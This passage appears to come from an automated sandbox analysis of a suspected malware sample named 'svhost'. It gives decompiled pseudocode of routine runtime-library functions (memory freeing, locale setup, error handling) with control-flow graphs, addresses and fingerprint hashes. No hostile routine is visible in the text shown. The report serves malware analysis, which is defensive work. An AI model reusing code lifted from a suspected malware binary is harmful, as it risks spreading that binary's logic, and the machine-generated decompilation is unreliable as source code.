                                      control_flow_graph 471 ea4519-ea453a call ea467d 474 ea457f 471->474 475 ea453c-ea456b call eb0efc call eb0af3 471->475 477 ea4581-ea4585 474->477 481 ea456d-ea4570 475->481 482 ea4586-ea4597 call eb0559 475->482 484 ea4672-ea467c call ea4980 481->484 485 ea4576-ea4579 481->485 482->474 488 ea4599-ea45b3 call eb0af3 482->488 485->474 485->484 492 ea45d0-ea45e2 488->492 493 ea45b5-ea45b8 488->493 496 ea460a-ea4614 492->496 497 ea45e4-ea45ea 492->497 494 ea45be-ea45c1 493->494 495 ea4670 493->495 494->495 500 ea45c7-ea45ce call eb051f 494->500 495->484 498 ea464f-ea466b 496->498 499 ea4616-ea461d 496->499 497->496 501 ea45ec-ea4607 call eb051f 497->501 498->477 499->498 502 ea461f-ea462b 499->502 500->474 501->496 502->498 505 ea462d-ea4632 502->505 505->498 508 ea4634-ea464a call eb051f 505->508 508->498
                                      C-Code - Quality: 76%
                                      			E00EA4519(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v0;
				char _v8;
				char _v12;
				signed int _v16;
				char _v20;
				signed int _v44;
				char _v80;
				char _v84;
				void* _v93;
				char _v100;
				char _v104;
				char* _v108;
				char _v112;
				void* __ebp;
				intOrPtr* _t72;
				signed int _t73;
				char _t74;
				void* _t77;
				signed int _t82;
				char _t86;
				signed int _t89;
				signed int _t97;
				signed int _t108;
				signed int _t112;
				void* _t113;
				char _t118;
				void* _t122;
				signed int _t127;
				signed int _t128;
				void* _t131;
				signed int _t133;
				signed int _t135;
				signed int _t145;
				void* _t147;
				intOrPtr* _t158;
				intOrPtr _t160;
				void* _t161;
				signed int _t164;
				void* _t168;
				void* _t170;
				void* _t171;
				void* _t172;

				_push(__ebx);
				_push(__esi);
				_t164 = __ecx;
				_push(__edi);
				_t1 = _t164 + 4; // 0x8b50f845
				_push( *((intOrPtr*)( *_t1)));
				_t72 =  *((intOrPtr*)(__ecx));
				_push( *_t72); // executed
				L22(); // executed
				_t158 = _t72;
				_pop(_t131);
				if(_t158 == 0) {
					L4:
					_t73 = 0;
					goto L5;
				} else {
					_t74 = E00EB0EFC(_t131, __edx);
					_v12 = _t74;
					_t127 = 0;
					_v20 =  *((intOrPtr*)(_t74 + 0x4c));
					_t133 =  *(_t74 + 0x48);
					_t6 =  &_v20; // 0xea474e
					_v16 = _t133;
					_v8 = 0;
					_t77 = E00EB0AF3(0, _t133, __edx,  &_v8, 0, 0, _t158, 0, _t6);
					_t171 = _t170 + 0x18;
					if(_t77 == 0) {
						_t128 = E00EB0559(_v8 + 4);
						__eflags = _t128;
						if(_t128 == 0) {
							goto L4;
						} else {
							_t11 =  &_v20; // 0xea474e
							_t133 = _t11;
							_t13 = _t128 + 4; // 0x4
							_t82 = E00EB0AF3(_t128, _t133, __edx, 0, _t13, _v8, _t158, 0xffffffff, _t133);
							_t171 = _t171 + 0x18;
							__eflags = _t82;
							if(_t82 == 0) {
								_t135 = _t133 | 0xffffffff;
								_t14 =  &_v20; // 0xea474e
								_t160 =  *_t14;
								__eflags =  *(_t160 + 0x24 + ( *((intOrPtr*)( *_t164)) +  *((intOrPtr*)( *_t164))) * 8);
								if(__eflags != 0) {
									asm("lock xadd [edx], eax");
									if(__eflags == 0) {
										E00EB051F( *(_t160 + 0x24 + ( *((intOrPtr*)( *_t164)) +  *((intOrPtr*)( *_t164))) * 8));
										_pop(_t145);
										 *(_t160 + 0x24 + ( *((intOrPtr*)( *_t164)) +  *((intOrPtr*)( *_t164))) * 8) =  *(_t160 + 0x24 + ( *((intOrPtr*)( *_t164)) +  *((intOrPtr*)( *_t164))) * 8) & 0x00000000;
										_t135 = _t145 | 0xffffffff;
										__eflags = _t135;
									}
								}
								_t86 = _v12;
								__eflags =  *(_t86 + 0x350) & 0x00000002;
								if(( *(_t86 + 0x350) & 0x00000002) == 0) {
									__eflags =  *0xeef2c4 & 0x00000001;
									if(( *0xeef2c4 & 0x00000001) == 0) {
										_t89 =  *((intOrPtr*)( *_t164)) +  *((intOrPtr*)( *_t164));
										__eflags =  *(_t160 + 0x24 + _t89 * 8);
										if( *(_t160 + 0x24 + _t89 * 8) != 0) {
											asm("lock xadd [eax], ecx");
											__eflags = _t135 == 1;
											if(_t135 == 1) {
												E00EB051F( *(_t160 + 0x24 + ( *((intOrPtr*)( *_t164)) +  *((intOrPtr*)( *_t164))) * 8));
												_t97 =  *((intOrPtr*)( *_t164)) +  *((intOrPtr*)( *_t164));
												_t39 = _t160 + 0x24 + _t97 * 8;
												 *_t39 =  *(_t160 + 0x24 + _t97 * 8) & 0x00000000;
												__eflags =  *_t39;
											}
										}
									}
								}
								_t46 = _t128 + 4; // 0x4
								_t73 = _t46;
								 *_t128 =  *((intOrPtr*)(_t160 + 0xc));
								 *(_t160 + 0x24 + ( *((intOrPtr*)( *_t164)) +  *((intOrPtr*)( *_t164))) * 8) = _t128;
								 *((intOrPtr*)(_t160 + 0x1c + ( *((intOrPtr*)( *_t164)) +  *((intOrPtr*)( *_t164))) * 8)) = _t73;
								L5:
								return _t73;
							} else {
								__eflags = _t82 - 0x16;
								if(_t82 == 0x16) {
									L20:
									_t127 = 0;
									__eflags = 0;
									goto L21;
								} else {
									__eflags = _t82 - 0x22;
									if(_t82 == 0x22) {
										goto L20;
									} else {
										E00EB051F(_t128);
										goto L4;
									}
								}
							}
						}
					} else {
						if(_t77 == 0x16 || _t77 == 0x22) {
							L21:
							_push(_t127);
							_push(_t127);
							_push(_t127);
							_push(_t127);
							_push(_t127);
							E00EA4980();
							asm("int3");
							_t168 = _t171;
							_push(_t133);
							__eflags = _v44;
							if(_v44 != 0) {
								_push(_t164);
								_push(_t158);
								_t161 = 0;
								_t108 = E00EB082A( &_v12, 0, 0, _a4, 0x7fffffff);
								_t172 = _t171 + 0x14;
								__eflags = _t108;
								if(_t108 == 0) {
									L27:
									_t164 = E00EB04C2(_v12, 2);
									_pop(_t147);
									__eflags = _t164;
									if(_t164 == 0) {
										L33:
										E00EB051F(_t164);
										return _t161;
									} else {
										_t112 = E00EB082A(_t161, _t164, _v12, _a4, 0xffffffff);
										_t172 = _t172 + 0x14;
										__eflags = _t112;
										if(_t112 == 0) {
											_t113 = E00EAE8FD(_t147, _v0, _t164); // executed
											_t161 = _t113;
											goto L33;
										} else {
											__eflags = _t112 - 0x16;
											if(_t112 == 0x16) {
												goto L34;
											} else {
												__eflags = _t112 - 0x22;
												if(_t112 == 0x22) {
													goto L34;
												} else {
													goto L33;
												}
											}
										}
									}
								} else {
									__eflags = _t108 - 0x16;
									if(_t108 == 0x16) {
										L34:
										_push(_t161);
										_push(_t161);
										_push(_t161);
										_push(_t161);
										_push(_t161);
										E00EA4980();
										asm("int3");
										_push(_t168);
										E00EB192F();
										_v112 =  &_v84;
										_v108 =  &_v80;
										_t118 = 4;
										_v100 = _t118;
										_v104 = _t118;
										_push( &_v100);
										_push( &_v112);
										_push( &_v104); // executed
										_t122 = E00EA44BE(_t127, _t161, _t164, __eflags); // executed
										return _t122;
									} else {
										__eflags = _t108 - 0x22;
										if(_t108 == 0x22) {
											goto L34;
										} else {
											goto L27;
										}
									}
								}
							} else {
								return E00EAE8FD(_t133, _v0, 0);
							}
						} else {
							goto L4;
						}
					}
				}
			}













































                                      0x00ea4521
                                      0x00ea4522
                                      0x00ea4523
                                      0x00ea4525
                                      0x00ea4526
                                      0x00ea4529
                                      0x00ea452b
                                      0x00ea452d
                                      0x00ea452f
                                      0x00ea4534
                                      0x00ea4537
                                      0x00ea453a
                                      0x00ea457f
                                      0x00ea457f
                                      0x00000000
                                      0x00ea453c
                                      0x00ea453c
                                      0x00ea4541
                                      0x00ea4544
                                      0x00ea4549
                                      0x00ea454c
                                      0x00ea454f
                                      0x00ea4559
                                      0x00ea455e
                                      0x00ea4561
                                      0x00ea4566
                                      0x00ea456b
                                      0x00ea4592
                                      0x00ea4595
                                      0x00ea4597
                                      0x00000000
                                      0x00ea4599
                                      0x00ea4599
                                      0x00ea4599
                                      0x00ea45a3
                                      0x00ea45a9
                                      0x00ea45ae
                                      0x00ea45b1
                                      0x00ea45b3
                                      0x00ea45d2
                                      0x00ea45d5
                                      0x00ea45d5
                                      0x00ea45e0
                                      0x00ea45e2
                                      0x00ea45e6
                                      0x00ea45ea
                                      0x00ea45f6
                                      0x00ea45fd
                                      0x00ea4602
                                      0x00ea4607
                                      0x00ea4607
                                      0x00ea4607
                                      0x00ea45ea
                                      0x00ea460a
                                      0x00ea460d
                                      0x00ea4614
                                      0x00ea4616
                                      0x00ea461d
                                      0x00ea4623
                                      0x00ea4629
                                      0x00ea462b
                                      0x00ea462d
                                      0x00ea4631
                                      0x00ea4632
                                      0x00ea463e
                                      0x00ea4648
                                      0x00ea464a
                                      0x00ea464a
                                      0x00ea464a
                                      0x00ea464a
                                      0x00ea4632
                                      0x00ea462b
                                      0x00ea461d
                                      0x00ea4652
                                      0x00ea4652
                                      0x00ea4655
                                      0x00ea465d
                                      0x00ea4667
                                      0x00ea4581
                                      0x00ea4585
                                      0x00ea45b5
                                      0x00ea45b5
                                      0x00ea45b8
                                      0x00ea4670
                                      0x00ea4670
                                      0x00ea4670
                                      0x00000000
                                      0x00ea45be
                                      0x00ea45be
                                      0x00ea45c1
                                      0x00000000
                                      0x00ea45c7
                                      0x00ea45c8
                                      0x00000000
                                      0x00ea45cd
                                      0x00ea45c1
                                      0x00ea45b8
                                      0x00ea45b3
                                      0x00ea456d
                                      0x00ea4570
                                      0x00ea4672
                                      0x00ea4672
                                      0x00ea4673
                                      0x00ea4674
                                      0x00ea4675
                                      0x00ea4676
                                      0x00ea4677
                                      0x00ea467c
                                      0x00ea4680
                                      0x00ea4682
                                      0x00ea4683
                                      0x00ea4687
                                      0x00ea4697
                                      0x00ea4698
                                      0x00ea46a1
                                      0x00ea46a9
                                      0x00ea46ae
                                      0x00ea46b1
                                      0x00ea46b3
                                      0x00ea46bf
                                      0x00ea46c9
                                      0x00ea46cc
                                      0x00ea46cd
                                      0x00ea46cf
                                      0x00ea4700
                                      0x00ea4701
                                      0x00ea470c
                                      0x00ea46d1
                                      0x00ea46db
                                      0x00ea46e0
                                      0x00ea46e3
                                      0x00ea46e5
                                      0x00ea46f7
                                      0x00ea46fe
                                      0x00000000
                                      0x00ea46e7
                                      0x00ea46e7
                                      0x00ea46ea
                                      0x00000000
                                      0x00ea46ec
                                      0x00ea46ec
                                      0x00ea46ef
                                      0x00000000
                                      0x00ea46f1
                                      0x00000000
                                      0x00ea46f1
                                      0x00ea46ef
                                      0x00ea46ea
                                      0x00ea46e5
                                      0x00ea46b5
                                      0x00ea46b5
                                      0x00ea46b8
                                      0x00ea470d
                                      0x00ea470d
                                      0x00ea470e
                                      0x00ea470f
                                      0x00ea4710
                                      0x00ea4711
                                      0x00ea4712
                                      0x00ea4717
                                      0x00ea471a
                                      0x00ea4720
                                      0x00ea4728
                                      0x00ea4733
                                      0x00ea4736
                                      0x00ea4737
                                      0x00ea473a
                                      0x00ea4740
                                      0x00ea4744
                                      0x00ea4748
                                      0x00ea4749
                                      0x00ea474f
                                      0x00ea46ba
                                      0x00ea46ba
                                      0x00ea46bd
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00ea46bd
                                      0x00ea46b8
                                      0x00ea4689
                                      0x00ea4696
                                      0x00ea4696
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00ea4570
                                      0x00ea456b

                                      APIs
                                        • Part of subcall function 00EB0EFC: GetLastError.KERNEL32(00000008,00E62ABC,00000000,00EB2C01,00E76827,00E7686D,?,00E76684,00000000,00000000), ref: 00EB0F01
                                        • Part of subcall function 00EB0EFC: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00E76684,00000000,00000000), ref: 00EB0F9F
                                      • _free.LIBCMT ref: 00EA45C8
                                      • _free.LIBCMT ref: 00EA45F6
                                      • _free.LIBCMT ref: 00EA463E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorLast
                                      • String ID: NG
                                      • API String ID: 3291180501-1393662826
                                      • Opcode ID: f14ec22a7d0dfb598cdaa37bb9d3381a1302934e4913bdd21db6aefcb44de16e
                                      • Instruction ID: 1ff9fddf59654772bff2c5430211ca66a1290b104b3b2230469a424abfb46169
                                      • Opcode Fuzzy Hash: f14ec22a7d0dfb598cdaa37bb9d3381a1302934e4913bdd21db6aefcb44de16e
                                      • Instruction Fuzzy Hash: 5041BEB16001059FDB24DFACC881AA6B3E9FF8E318B24056DE405EB291DBB1FC109B50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E55350 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 511 e55350-e5538d call e76652 514 e55393-e553d7 call e515c0 call e57e90 call e55180 call e555a0 511->514 515 e5543d-e55443 511->515 534 e553df-e553f0 call e74d55 514->534 535 e553d9-e553dd 514->535 517 e55445-e55465 515->517 518 e5548b-e554a3 call e89a35 515->518 524 e55467-e55478 517->524 525 e5547a 517->525 527 e55481-e55486 call e72801 524->527 525->527 527->518 538 e553f5-e55416 call e57e90 call e56770 534->538 536 e5541b-e55422 call e55250 535->536 541 e55427-e55438 call e55300 536->541 538->536 541->515
                                      C-Code - Quality: 69%
                                      			E00E55350(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* _a4, intOrPtr _a8) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v72;
				char _v76;
				signed char _v77;
				intOrPtr _v84;
				intOrPtr* _v88;
				intOrPtr* _v92;
				intOrPtr _v96;
				void* __ebp;
				signed int _t51;
				signed int _t52;
				void* _t64;
				void* _t71;
				void* _t105;
				void* _t106;
				signed int _t107;

				_t106 = __esi;
				_t105 = __edi;
				_t76 = __ebx;
				_push(0xffffffff);
				_push(0xec0400);
				_push( *[fs:0x0]);
				_t51 =  *0xeef074; // 0x221cac15
				_t52 = _t51 ^ _t107;
				_v20 = _t52;
				_push(_t52);
				 *[fs:0x0] =  &_v16;
				_v84 = __ecx;
				_v77 = 0;
				_push(0);
				E00E76652();
				_t112 = _a8;
				if(_a8 != 0) {
					_v76 =  *((intOrPtr*)(_v84 + 4));
					_v8 = 0;
					E00E515C0( &_v72, 0x34);
					_t64 = E00E57E90();
					_t100 = _a8;
					E00E55180(__ebx, _t105, _t112, _a8, _t64);
					_v8 = 1;
					if((E00E555A0(_v84, _t112,  &_v72) & 0x000000ff) == 0) {
						_push(0);
						_push( *((intOrPtr*)(_v84 + 4)));
						_push(_a8);
						_push( &_v72); // executed
						L00E74D55( &_v72, _t106); // executed
						_t100 = _a8;
						 *((intOrPtr*)( *((intOrPtr*)(_v84 + 4)) + 0x10)) = _a8;
						_t71 = E00E57E90();
						__eflags =  *((intOrPtr*)(_v84 + 4)) + 0x18;
						E00E56770( *((intOrPtr*)(_v84 + 4)) + 0x18, _t71);
					} else {
						_v77 = 1;
					}
					_v8 = 0;
					E00E55250();
					_v76 = 0;
					_v8 = 0xffffffff;
					E00E55300( &_v76);
				}
				if((_v77 & 0x000000ff) != 0) {
					_t100 =  *((intOrPtr*)( *((intOrPtr*)(_v84 + 4))));
					_v92 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v84 + 4)))) + 8))))();
					_v88 = _v92;
					if(_v88 == 0) {
						_v96 = 0;
					} else {
						_t100 =  *((intOrPtr*)( *_v88));
						_v96 =  *((intOrPtr*)( *((intOrPtr*)( *_v88))))(1);
					}
					E00E72801("bad locale name");
				}
				 *[fs:0x0] = _v16;
				return E00E89A35(_t76, _v20 ^ _t107, _t100, _t105, _t106);
			}





















                                      0x00e55350
                                      0x00e55350
                                      0x00e55350
                                      0x00e55353
                                      0x00e55355
                                      0x00e55360
                                      0x00e55364
                                      0x00e55369
                                      0x00e5536b
                                      0x00e5536e
                                      0x00e55372
                                      0x00e55378
                                      0x00e5537b
                                      0x00e5537f
                                      0x00e55381
                                      0x00e55389
                                      0x00e5538d
                                      0x00e55399
                                      0x00e5539c
                                      0x00e553a8
                                      0x00e553b0
                                      0x00e553b6
                                      0x00e553bd
                                      0x00e553c2
                                      0x00e553d7
                                      0x00e553df
                                      0x00e553e7
                                      0x00e553eb
                                      0x00e553ef
                                      0x00e553f0
                                      0x00e553fe
                                      0x00e55401
                                      0x00e55407
                                      0x00e55413
                                      0x00e55416
                                      0x00e553d9
                                      0x00e553d9
                                      0x00e553d9
                                      0x00e5541b
                                      0x00e55422
                                      0x00e55427
                                      0x00e5542e
                                      0x00e55438
                                      0x00e55438
                                      0x00e55443
                                      0x00e5544e
                                      0x00e55458
                                      0x00e5545e
                                      0x00e55465
                                      0x00e5547a
                                      0x00e55467
                                      0x00e55471
                                      0x00e55475
                                      0x00e55475
                                      0x00e55486
                                      0x00e55486
                                      0x00e5548e
                                      0x00e554a3

                                      APIs
                                      • std::locale::_Init.LIBCPMT ref: 00E55381
                                        • Part of subcall function 00E76652: __EH_prolog3.LIBCMT ref: 00E76659
                                        • Part of subcall function 00E76652: std::_Lockit::_Lockit.LIBCPMT ref: 00E76664
                                        • Part of subcall function 00E76652: std::locale::_Setgloballocale.LIBCPMT ref: 00E7667F
                                        • Part of subcall function 00E76652: std::_Lockit::~_Lockit.LIBCPMT ref: 00E766D5
                                        • Part of subcall function 00E55180: std::_Lockit::_Lockit.LIBCPMT ref: 00E551AB
                                        • Part of subcall function 00E55180: _Yarn.LIBCPMTD ref: 00E551BD
                                        • Part of subcall function 00E55180: _Yarn.LIBCPMTD ref: 00E551CC
                                        • Part of subcall function 00E55180: _Yarn.LIBCPMTD ref: 00E551DB
                                        • Part of subcall function 00E55180: _Yarn.LIBCPMTD ref: 00E551EA
                                        • Part of subcall function 00E55180: _Yarn.LIBCPMTD ref: 00E551F9
                                        • Part of subcall function 00E55180: _Yarn.LIBCPMTD ref: 00E55208
                                      • std::_Locinfo::~_Locinfo.LIBCPMTD ref: 00E55422
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Yarn$std::_$Lockit$Lockit::_std::locale::_$H_prolog3InitLocinfoLocinfo::~_Lockit::~_Setgloballocale
                                      • String ID: bad locale name
                                      • API String ID: 3202388342-1405518554
                                      • Opcode ID: c036ee8f65957072bd62ffe21eed5ac8671abed7723df8b9a0461b3a65aa67c3
                                      • Instruction ID: ff4823a4dfd29f2fb7bd2e06a222f068b6c9c65ec7bd2f4df1b56d8273794157
                                      • Opcode Fuzzy Hash: c036ee8f65957072bd62ffe21eed5ac8671abed7723df8b9a0461b3a65aa67c3
                                      • Instruction Fuzzy Hash: 7B415C75A00648DFCB04DFD4C991BADB7F1BF48305F108559E81A6B395DB74AE49CB80
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00EA467D Relevance: 4.6, APIs: 3, Instructions: 96COMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 545 ea467d-ea4687 546 ea4689-ea4696 call eae8fd 545->546 547 ea4697-ea46b3 call eb082a 545->547 552 ea46bf-ea46cf call eb04c2 547->552 553 ea46b5-ea46b8 547->553 560 ea4700-ea470c call eb051f 552->560 561 ea46d1-ea46e5 call eb082a 552->561 554 ea46ba-ea46bd 553->554 555 ea470d-ea4749 call ea4980 call eb192f call ea44be 553->555 554->552 554->555 575 ea474e-ea474f 555->575 569 ea46f3-ea46f7 call eae8fd 561->569 570 ea46e7-ea46ea 561->570 574 ea46fc-ea46fe 569->574 570->555 573 ea46ec-ea46ef 570->573 573->555 576 ea46f1 573->576 574->560 576->560
                                      C-Code - Quality: 71%
                                      			E00EA467D(void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				char _v28;
				char _v32;
				void* _v41;
				char _v48;
				char _v52;
				char* _v56;
				char _v60;
				void* __ebp;
				void* _t20;
				void* _t24;
				void* _t25;
				char _t30;
				void* _t34;
				void* _t36;
				void* _t39;
				void* _t47;
				void* _t53;
				void* _t54;

				_t49 = __esi;
				_push(__ecx);
				if(_a8 != 0) {
					_push(__esi);
					_push(__edi);
					_t47 = 0;
					_t20 = E00EB082A( &_v8, 0, 0, _a8, 0x7fffffff);
					_t54 = _t53 + 0x14;
					__eflags = _t20;
					if(_t20 == 0) {
						L5:
						_t49 = E00EB04C2(_v8, 2);
						_pop(_t39);
						__eflags = _t49;
						if(_t49 == 0) {
							L11:
							E00EB051F(_t49);
							return _t47;
						} else {
							_t24 = E00EB082A(_t47, _t49, _v8, _a8, 0xffffffff);
							_t54 = _t54 + 0x14;
							__eflags = _t24;
							if(_t24 == 0) {
								_t25 = E00EAE8FD(_t39, _a4, _t49); // executed
								_t47 = _t25;
								goto L11;
							} else {
								__eflags = _t24 - 0x16;
								if(_t24 == 0x16) {
									goto L12;
								} else {
									__eflags = _t24 - 0x22;
									if(_t24 == 0x22) {
										goto L12;
									} else {
										goto L11;
									}
								}
							}
						}
					} else {
						__eflags = _t20 - 0x16;
						if(_t20 == 0x16) {
							L12:
							_push(_t47);
							_push(_t47);
							_push(_t47);
							_push(_t47);
							_push(_t47);
							E00EA4980();
							asm("int3");
							E00EB192F();
							_v60 =  &_v32;
							_v56 =  &_v28;
							_t30 = 4;
							_v48 = _t30;
							_v52 = _t30;
							_push( &_v48);
							_push( &_v60);
							_push( &_v52); // executed
							_t34 = E00EA44BE(_t36, _t47, _t49, __eflags); // executed
							return _t34;
						} else {
							__eflags = _t20 - 0x22;
							if(_t20 == 0x22) {
								goto L12;
							} else {
								goto L5;
							}
						}
					}
				} else {
					return E00EAE8FD(__ecx, _a4, 0);
				}
			}






















                                      0x00ea467d
                                      0x00ea4682
                                      0x00ea4687
                                      0x00ea4697
                                      0x00ea4698
                                      0x00ea46a1
                                      0x00ea46a9
                                      0x00ea46ae
                                      0x00ea46b1
                                      0x00ea46b3
                                      0x00ea46bf
                                      0x00ea46c9
                                      0x00ea46cc
                                      0x00ea46cd
                                      0x00ea46cf
                                      0x00ea4700
                                      0x00ea4701
                                      0x00ea470c
                                      0x00ea46d1
                                      0x00ea46db
                                      0x00ea46e0
                                      0x00ea46e3
                                      0x00ea46e5
                                      0x00ea46f7
                                      0x00ea46fe
                                      0x00000000
                                      0x00ea46e7
                                      0x00ea46e7
                                      0x00ea46ea
                                      0x00000000
                                      0x00ea46ec
                                      0x00ea46ec
                                      0x00ea46ef
                                      0x00000000
                                      0x00ea46f1
                                      0x00000000
                                      0x00ea46f1
                                      0x00ea46ef
                                      0x00ea46ea
                                      0x00ea46e5
                                      0x00ea46b5
                                      0x00ea46b5
                                      0x00ea46b8
                                      0x00ea470d
                                      0x00ea470d
                                      0x00ea470e
                                      0x00ea470f
                                      0x00ea4710
                                      0x00ea4711
                                      0x00ea4712
                                      0x00ea4717
                                      0x00ea4720
                                      0x00ea4728
                                      0x00ea4733
                                      0x00ea4736
                                      0x00ea4737
                                      0x00ea473a
                                      0x00ea4740
                                      0x00ea4744
                                      0x00ea4748
                                      0x00ea4749
                                      0x00ea474f
                                      0x00ea46ba
                                      0x00ea46ba
                                      0x00ea46bd
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00ea46bd
                                      0x00ea46b8
                                      0x00ea4689
                                      0x00ea4696
                                      0x00ea4696

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __cftoe$_free
                                      • String ID:
                                      • API String ID: 1303422935-0
                                      • Opcode ID: b6cc7532890766a9f049ea20fd37b1357cb9dad976b8099125afae3939dffc56
                                      • Instruction ID: c5fe4e3d2e573709696b0a87fbdcf28ea868a9900f98492dd244e6ed158e144e
                                      • Opcode Fuzzy Hash: b6cc7532890766a9f049ea20fd37b1357cb9dad976b8099125afae3939dffc56
                                      • Instruction Fuzzy Hash: CB21C7B28002087ACF259A99DC45EDF7BE9DFCB324F215167F515FA1C1EB70EA008A91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E554B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 585 e554b0-e554ec call e767e7 588 e554ee-e554f3 call e72801 585->588 589 e554f8-e55516 call e58000 call e55350 585->589 588->589 594 e5551b-e5553b call e57f50 589->594
                                      C-Code - Quality: 76%
                                      			E00E554B0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v20;
				char _v44;
				void* __ebp;
				signed int _t17;
				void* _t27;
				void* _t37;
				void* _t38;
				signed int _t39;

				_t38 = __esi;
				_t37 = __edi;
				_t27 = __ebx;
				_push(0xffffffff);
				_push(0xebfdd8);
				_push( *[fs:0x0]);
				_t17 =  *0xeef074; // 0x221cac15
				_push(_t17 ^ _t39);
				 *[fs:0x0] =  &_v16;
				_v20 = __ecx;
				 *((intOrPtr*)(_v20 + 4)) = E00E767E7(__eflags, 0);
				_t44 = _a4;
				if(_a4 == 0) {
					E00E72801("bad locale name");
				}
				E00E58000(_t27,  &_v44, _t37, _t38, _t44, _a4);
				_v8 = 0;
				E00E55350(_t27, _v20, _t37, _t38,  &_v44, _a8); // executed
				_v8 = 0xffffffff;
				E00E57F50( &_v44);
				 *[fs:0x0] = _v16;
				return _v20;
			}













                                      0x00e554b0
                                      0x00e554b0
                                      0x00e554b0
                                      0x00e554b3
                                      0x00e554b5
                                      0x00e554c0
                                      0x00e554c4
                                      0x00e554cb
                                      0x00e554cf
                                      0x00e554d5
                                      0x00e554e5
                                      0x00e554e8
                                      0x00e554ec
                                      0x00e554f3
                                      0x00e554f3
                                      0x00e554ff
                                      0x00e55504
                                      0x00e55516
                                      0x00e5551b
                                      0x00e55525
                                      0x00e55530
                                      0x00e5553b

                                      APIs
                                        • Part of subcall function 00E767E7: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00E767FF
                                      • task.LIBCPMTD ref: 00E55525
                                        • Part of subcall function 00E72801: std::bad_exception::bad_exception.LIBCMTD ref: 00E7280D
                                        • Part of subcall function 00E72801: __CxxThrowException@8.LIBVCRUNTIME ref: 00E7281B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
